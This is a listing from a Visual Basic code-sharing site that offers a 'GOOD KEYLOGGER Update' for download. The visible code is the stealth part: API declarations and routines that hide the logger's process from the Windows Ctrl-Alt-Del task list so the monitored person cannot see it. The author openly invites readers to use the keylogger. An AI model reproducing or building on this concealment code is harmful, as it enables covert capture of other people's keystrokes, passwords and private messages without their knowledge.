VBcoders Browse New Submit Contact Sign In

No account? Register free

Forgot password?

GOOD KEYLOGGER Update

Jeff Katz  (3 Submissions)   Miscellaneous   Visual Basic 3.0   Intermediate   Wed 3rd February 2021

As I Was Looking Around Your Site For Some New ideas, i saw, quote: "THE BEST KEYLOGGER ON vbcoders". I Checked it out, and Here's Mine... Have a Go With It. Remember if you like my code PLEASE vote highly for it!

Assumes
form (form1), 2 command buttons (command1, caption: HIDE) (command2, caption: END), a textbox (text1, multiline:true), and a module (module1)

Side Effects
a SLIGHT proccesor usage increase, not noticable in a p2 or greater

API Declarations
' copy into module
Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long ' get this process
Public Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long ' and then un-register it!
Public Const RSP_SIMPLE_SERVICE = 1
Public Const RSP_UNREGISTER_SERVICE = 0 'seems odd, the way these are named
Public Sub HIDECAD()
Dim pid As Long
Dim reserv As Long
pid = GetCurrentProcessId()
regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)
End Sub
Public Sub SHOWCAD()
Dim pid As Long
Dim reserv As Long
pid = GetCurrentProcessId()
regserv = RegisterServiceProcess(pid, RSP_UNREGISTER_SERVICE)
End Sub

Rate GOOD KEYLOGGER Update (3(3 Vote))
GOOD KEYLOGGER Update.bas

GOOD KEYLOGGER Update Comments

No comments yet — be the first to post one!

Post a Comment

0/1000 characters